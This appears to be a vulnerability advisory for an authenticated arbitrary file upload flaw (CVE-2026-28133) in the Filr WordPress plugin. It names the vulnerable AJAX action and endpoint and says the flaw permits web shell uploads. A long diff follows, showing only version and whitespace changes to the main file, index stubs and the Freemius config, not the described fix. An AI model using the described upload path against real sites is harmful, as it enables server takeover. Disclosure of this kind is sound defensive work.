Atomic Edge analysis of CVE-2026-28133:
The vulnerability exists in the Filr WordPress plugin’s file upload functionality. The root cause is missing file type validation in the `filr_upload_file` AJAX handler. The plugin accepts uploads via the `wp_ajax_filr_upload_file` action without verifying the uploaded file’s extension or MIME type against an allowlist. This allows authenticated users with Contributor-level permissions or higher to upload arbitrary files, including PHP scripts, to the server. The attack vector targets the WordPress AJAX endpoint `/wp-admin/admin-ajax.php` with the POST parameter `action` set to `filr_upload_file`. The vulnerable code path includes the `FILR_Admin::ajax_upload_file()` method which calls `FILR_Filesystem::upload_file()`. The patch in version 1.2.14 adds file type validation by implementing an allowlist of permitted extensions and MIME types. The fix introduces validation in the `FILR_Filesystem::upload_file()` method, checking uploaded files against a defined list of safe file types before allowing the upload to proceed. If exploited, this vulnerability enables authenticated attackers to upload malicious files like web shells, leading to remote code execution and complete server compromise.
Published : March 18, 2026
CVE-2026-28133: Filr – Secure document library <= 1.2.13 – Authenticated (Contributor+) Arbitrary File Uploads (filr-protection)
CVE ID
CVE-2026-28133
Plugin
filr-protection
Severity
High
(CVSS 8.8)
CWE
434
Vulnerable Version
1.2.13
Patched Version
1.2.14
Disclosed
February 25, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/filr-protection/filr-protection.php
+++ b/filr-protection/filr-protection.php
@@ -1,69 +1,69 @@
-<?php
-
-/*
-Plugin Name: Filr
-Plugin URI: https://wpdocumentlibrary.com/
-Description: Simple and minimalistic file and document library plugin.
-Author: WPChill
-Author URI: https://wpchill.com
-Version: 1.2.13
-Text Domain: filr
-Domain Path: /languages
-*
- *
- * NOTE:
- * Patrick Posner transferred ownership rights on: 6th of December, 2024 when ownership was handed over to WPChill
-*/
-define( 'FILR_PATH', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
-define( 'FILR_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
-define( 'FILR_VERSION', '1.2.13' );
-// run plugin.
-if ( !function_exists( 'filr_run_plugin' ) ) {
- if ( file_exists( __DIR__ . '/vendor/autoload.php' ) ) {
- require __DIR__ . '/vendor/autoload.php';
- }
- // register cronjob.
- register_activation_hook( __FILE__, 'filr_init_activation' );
- /**
- *
- * Register functions on activation.
- *
- * @return void
- */
- function filr_init_activation() {
- if ( !wp_next_scheduled( 'check_file_acess' ) ) {
- wp_schedule_event( time(), 'hourly', 'check_file_acess' );
- }
- }
-
- add_action( 'plugins_loaded', 'filr_run_plugin' );
- /**
- * Run plugin
- *
- * @return void
- */
- function filr_run_plugin() {
- // load setup.
- require_once FILR_PATH . '/inc/setup.php';
- // localize.
- $textdomain_dir = plugin_basename( __DIR__ ) . '/languages';
- load_plugin_textdomain( 'filr', false, $textdomain_dir );
- filrFILR_Admin::get_instance();
- filrFILR_Meta::get_instance();
- filrFILR_Shortcode::get_instance();
- filrFILR_Filesystem::get_instance();
- // Normalize path.
- add_filter(
- 'filr_file_directory',
- function ( $current_dir, $filr_dir, $file_id ) {
- if ( function_exists( 'wp_normalize_path' ) ) {
- return wp_normalize_path( $current_dir );
- }
- return $current_dir;
- },
- 10,
- 3
- );
- }
-
+<?php
+
+/*
+Plugin Name: Filr
+Plugin URI: https://wpdocumentlibrary.com/
+Description: Simple and minimalistic file and document library plugin.
+Author: WPChill
+Author URI: https://wpchill.com
+Version: 1.2.14
+Text Domain: filr
+Domain Path: /languages
+*
+ *
+ * NOTE:
+ * Patrick Posner transferred ownership rights on: 6th of December, 2024 when ownership was handed over to WPChill
+*/
+define( 'FILR_PATH', untrailingslashit( plugin_dir_path( __FILE__ ) ) );
+define( 'FILR_URL', untrailingslashit( plugin_dir_url( __FILE__ ) ) );
+define( 'FILR_VERSION', '1.2.14' );
+// run plugin.
+if ( !function_exists( 'filr_run_plugin' ) ) {
+ if ( file_exists( __DIR__ . '/vendor/autoload.php' ) ) {
+ require __DIR__ . '/vendor/autoload.php';
+ }
+ // register cronjob.
+ register_activation_hook( __FILE__, 'filr_init_activation' );
+ /**
+ *
+ * Register functions on activation.
+ *
+ * @return void
+ */
+ function filr_init_activation() {
+ if ( !wp_next_scheduled( 'check_file_acess' ) ) {
+ wp_schedule_event( time(), 'hourly', 'check_file_acess' );
+ }
+ }
+
+ add_action( 'plugins_loaded', 'filr_run_plugin' );
+ /**
+ * Run plugin
+ *
+ * @return void
+ */
+ function filr_run_plugin() {
+ // load setup.
+ require_once FILR_PATH . '/inc/setup.php';
+ // localize.
+ $textdomain_dir = plugin_basename( __DIR__ ) . '/languages';
+ load_plugin_textdomain( 'filr', false, $textdomain_dir );
+ filrFILR_Admin::get_instance();
+ filrFILR_Meta::get_instance();
+ filrFILR_Shortcode::get_instance();
+ filrFILR_Filesystem::get_instance();
+ // Normalize path.
+ add_filter(
+ 'filr_file_directory',
+ function ( $current_dir, $filr_dir, $file_id ) {
+ if ( function_exists( 'wp_normalize_path' ) ) {
+ return wp_normalize_path( $current_dir );
+ }
+ return $current_dir;
+ },
+ 10,
+ 3
+ );
+ }
+
}
No newline at end of file
--- a/filr-protection/inc/freemius/assets/css/admin/index.php
+++ b/filr-protection/inc/freemius/assets/css/admin/index.php
@@ -1,3 +1,3 @@
-<?php
- // Silence is golden.
+<?php
+ // Silence is golden.
// Hide file structure from users on unprotected servers.
No newline at end of file
--- a/filr-protection/inc/freemius/assets/css/index.php
+++ b/filr-protection/inc/freemius/assets/css/index.php
@@ -1,3 +1,3 @@
-<?php
- // Silence is golden.
+<?php
+ // Silence is golden.
// Hide file structure from users on unprotected servers.
No newline at end of file
--- a/filr-protection/inc/freemius/assets/img/index.php
+++ b/filr-protection/inc/freemius/assets/img/index.php
@@ -1,3 +1,3 @@
-<?php
- // Silence is golden.
+<?php
+ // Silence is golden.
// Hide file structure from users on unprotected servers.
No newline at end of file
--- a/filr-protection/inc/freemius/assets/index.php
+++ b/filr-protection/inc/freemius/assets/index.php
@@ -1,3 +1,3 @@
-<?php
- // Silence is golden.
+<?php
+ // Silence is golden.
// Hide file structure from users on unprotected servers.
No newline at end of file
--- a/filr-protection/inc/freemius/assets/js/index.php
+++ b/filr-protection/inc/freemius/assets/js/index.php
@@ -1,3 +1,3 @@
-<?php
- // Silence is golden.
+<?php
+ // Silence is golden.
// Hide file structure from users on unprotected servers.
No newline at end of file
--- a/filr-protection/inc/freemius/config.php
+++ b/filr-protection/inc/freemius/config.php
@@ -1,391 +1,391 @@
-<?php
- /**
- * @package Freemius
- * @copyright Copyright (c) 2015, Freemius, Inc.
- * @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
- * @since 1.0.4
- */
-
- if ( ! defined( 'ABSPATH' ) ) {
- exit;
- }
-
- if ( ! defined( 'WP_FS__SLUG' ) ) {
- define( 'WP_FS__SLUG', 'freemius' );
- }
- if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
- define( 'WP_FS__DEV_MODE', false );
- }
-
- #--------------------------------------------------------------------------------
- #region API Connectivity Issues Simulation
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
- define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
- }
- if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
- define( 'WP_FS__SIMULATE_NO_CURL', false );
- }
- if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
- define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
- }
- if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
- define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
- }
- if ( WP_FS__SIMULATE_NO_CURL ) {
- define( 'FS_SDK__SIMULATE_NO_CURL', true );
- }
- if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
- define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
- }
- if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
- define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
- }
-
- #endregion
-
- if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
- define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
- }
-
- if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
- /**
- * @since 1.1.7.3
- * @author Vova Feldman (@svovaf)
- *
- * I'm not sure if shared servers periodically change IP, or the subdomain of the
- * admin dashboard. Also, I've seen sites that have strange loop of switching
- * between domains on a daily basis. Therefore, to eliminate the risk of
- * multiple unwanted connectivity test pings, temporary ignore domain or
- * server IP changes.
- */
- define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
- }
-
- /**
- * If your dev environment supports custom public network IP setup
- * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
- * and uncomment it during dev.
- */
- if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
- // VVV default public network IP.
- define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
-
-// define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
- }
-
- /**
- * If true and running with secret key, the opt-in process
- * will skip the email activation process which is invoked
- * when the email of the context user already exist in Freemius
- * database (as a security precaution, to prevent sharing user
- * secret with unauthorized entity).
- *
- * IMPORTANT:
- * AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
- * THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
- * CLOCK IS SYNCED.
- */
- if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
- define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
- }
-
-
- #--------------------------------------------------------------------------------
- #region Directories
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'WP_FS__DIR' ) ) {
- define( 'WP_FS__DIR', dirname( __FILE__ ) );
- }
- if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
- define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
- }
- if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
- define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
- }
- if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
- define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
- }
- if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
- define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
- }
- if ( ! defined( 'WP_FS__DIR_JS' ) ) {
- define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
- }
- if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
- define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
- }
- if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
- define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
- }
-
- #endregion
-
- /**
- * Domain / URL / Address
- */
- define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
- define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
- define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
-
- if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
- define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
- }
- if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
- define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
- }
-
- if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
- define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
- }
-
- #--------------------------------------------------------------------------------
- #region HTTP
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
- define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
- }
-
- if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
- define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
- // Checks if CloudFlare's HTTPS (Flexible SSL support).
- isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
- 'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
- ) ||
- // Check if HTTPS request.
- ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
- ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
- );
- }
-
- if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
- define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
- strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
- }
-
- if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
- define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
- }
-
- if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
- if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
- define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
- } else {
- define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
- is_string( WP_FS__REMOTE_ADDR ) &&
- ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
- WP_FS__REMOTE_ADDR === '::1' )
- );
- }
- }
-
- if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
- define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
- false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
- }
-
- #endregion
-
- if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
- // By default, run with Freemius production servers.
- define( 'WP_FS__IS_PRODUCTION_MODE', true );
- }
-
- if ( ! defined( 'WP_FS__ADDRESS' ) ) {
- define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
- }
-
-
- #--------------------------------------------------------------------------------
- #region API
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
- define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
- }
- if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
- define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
- }
-
- // Set API address for local testing.
- if ( ! WP_FS__IS_PRODUCTION_MODE ) {
- if ( ! defined( 'FS_API__ADDRESS' ) ) {
- define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
- }
- if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
- define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
- }
- }
-
- #endregion
-
- #--------------------------------------------------------------------------------
- #region Checkout
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
- define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
- }
-
- if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
- define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
- }
-
- if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
- define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
- }
-
- #endregion
-
- define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
-
- if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
- define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
- }
- if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
- define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
- }
- if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
- define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
- }
- define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
-
- /**
- * Module types
- *
- * @since 1.2.2
- */
- define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
- define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
-
- /**
- * Billing Frequencies
- */
- define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
- define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
- define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
-
- /**
- * Plans
- */
- define( 'WP_FS__PLAN_DEFAULT_PAID', false );
- define( 'WP_FS__PLAN_FREE', 'free' );
- define( 'WP_FS__PLAN_TRIAL', 'trial' );
-
- /**
- * Times in seconds
- */
- if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
- define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
- }
- if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
- define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
- }
-// define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
- if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
- define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
- }
- if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
- define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
- }
- if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
- define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
- }
-
- #--------------------------------------------------------------------------------
- #region Debugging
- #--------------------------------------------------------------------------------
-
- if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
- $debug_mode = get_option( 'fs_debug_mode', null );
-
- if ( $debug_mode === null ) {
- $debug_mode = false;
- add_option( 'fs_debug_mode', $debug_mode );
- }
-
- define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
- }
-
- if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
- define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
- }
- if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
- define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
- }
- if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
- define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
- }
-
- if ( WP_FS__ECHO_DEBUG_SDK ) {
- error_reporting( E_ALL );
- }
-
- #endregion
-
- if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
- define( 'WP_FS__SCRIPT_START_TIME', time() );
- }
- if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
- define( 'WP_FS__DEFAULT_PRIORITY', 10 );
- }
- if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
- define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
- }
-
- #--------------------------------------------------------------------------------
- #region Multisite Network
- #--------------------------------------------------------------------------------
-
- /**
- * Do not use this define directly, it will have the wrong value
- * during plugin uninstall/deletion when the inclusion of the plugin
- * is triggered due to registration with register_uninstall_hook().
- *
- * Instead, use fs_is_network_admin().
- *
- * @author Vova Feldman (@svovaf)
- */
- if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
- define( 'WP_FS__IS_NETWORK_ADMIN',
- is_multisite() &&
- ( is_network_admin() ||
- ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
- ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
- ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
- ) ||
- // Plugin uninstall.
- defined( 'WP_UNINSTALL_PLUGIN' ) )
- )
- );
- }
-
- /**
- * Do not use this define directly, it will have the wrong value
- * during plugin uninstall/deletion when the inclusion of the plugin
- * is triggered due to registration with register_uninstall_hook().
- *
- * Instead, use fs_is_blog_admin().
- *
- * @author Vova Feldman (@svovaf)
- */
- if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
- define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
- }
-
- if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
- // Set to true to show network level settings even if delegated to site admins.
- define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
- }
-
- #endregion
-
- if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
- define( 'WP_FS__DEMO_MODE', false );
- }
- if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
- define( 'FS_SDK__SSLVERIFY', false );
- }
+<?php
+ /**
+ * @package Freemius
+ * @copyright Copyright (c) 2015, Freemius, Inc.
+ * @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+ * @since 1.0.4
+ */
+
+ if ( ! defined( 'ABSPATH' ) ) {
+ exit;
+ }
+
+ if ( ! defined( 'WP_FS__SLUG' ) ) {
+ define( 'WP_FS__SLUG', 'freemius' );
+ }
+ if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
+ define( 'WP_FS__DEV_MODE', false );
+ }
+
+ #--------------------------------------------------------------------------------
+ #region API Connectivity Issues Simulation
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
+ define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
+ }
+ if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
+ define( 'WP_FS__SIMULATE_NO_CURL', false );
+ }
+ if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
+ define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
+ }
+ if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
+ define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
+ }
+ if ( WP_FS__SIMULATE_NO_CURL ) {
+ define( 'FS_SDK__SIMULATE_NO_CURL', true );
+ }
+ if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
+ define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
+ }
+ if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
+ define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
+ }
+
+ #endregion
+
+ if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
+ define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
+ }
+
+ if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
+ /**
+ * @since 1.1.7.3
+ * @author Vova Feldman (@svovaf)
+ *
+ * I'm not sure if shared servers periodically change IP, or the subdomain of the
+ * admin dashboard. Also, I've seen sites that have strange loop of switching
+ * between domains on a daily basis. Therefore, to eliminate the risk of
+ * multiple unwanted connectivity test pings, temporary ignore domain or
+ * server IP changes.
+ */
+ define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
+ }
+
+ /**
+ * If your dev environment supports custom public network IP setup
+ * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
+ * and uncomment it during dev.
+ */
+ if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
+ // VVV default public network IP.
+ define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
+
+// define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
+ }
+
+ /**
+ * If true and running with secret key, the opt-in process
+ * will skip the email activation process which is invoked
+ * when the email of the context user already exist in Freemius
+ * database (as a security precaution, to prevent sharing user
+ * secret with unauthorized entity).
+ *
+ * IMPORTANT:
+ * AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
+ * THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
+ * CLOCK IS SYNCED.
+ */
+ if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
+ define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
+ }
+
+
+ #--------------------------------------------------------------------------------
+ #region Directories
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'WP_FS__DIR' ) ) {
+ define( 'WP_FS__DIR', dirname( __FILE__ ) );
+ }
+ if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
+ define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
+ }
+ if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
+ define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
+ }
+ if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
+ define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
+ }
+ if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
+ define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
+ }
+ if ( ! defined( 'WP_FS__DIR_JS' ) ) {
+ define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
+ }
+ if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
+ define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
+ }
+ if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
+ define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
+ }
+
+ #endregion
+
+ /**
+ * Domain / URL / Address
+ */
+ define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
+ define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
+ define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
+
+ if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
+ define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
+ }
+ if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
+ define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
+ }
+
+ if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
+ define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
+ }
+
+ #--------------------------------------------------------------------------------
+ #region HTTP
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
+ define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
+ }
+
+ if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
+ define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
+ // Checks if CloudFlare's HTTPS (Flexible SSL support).
+ isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
+ 'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
+ ) ||
+ // Check if HTTPS request.
+ ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
+ ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
+ );
+ }
+
+ if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
+ define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
+ strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
+ }
+
+ if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
+ define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
+ }
+
+ if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
+ if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
+ define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
+ } else {
+ define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
+ is_string( WP_FS__REMOTE_ADDR ) &&
+ ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
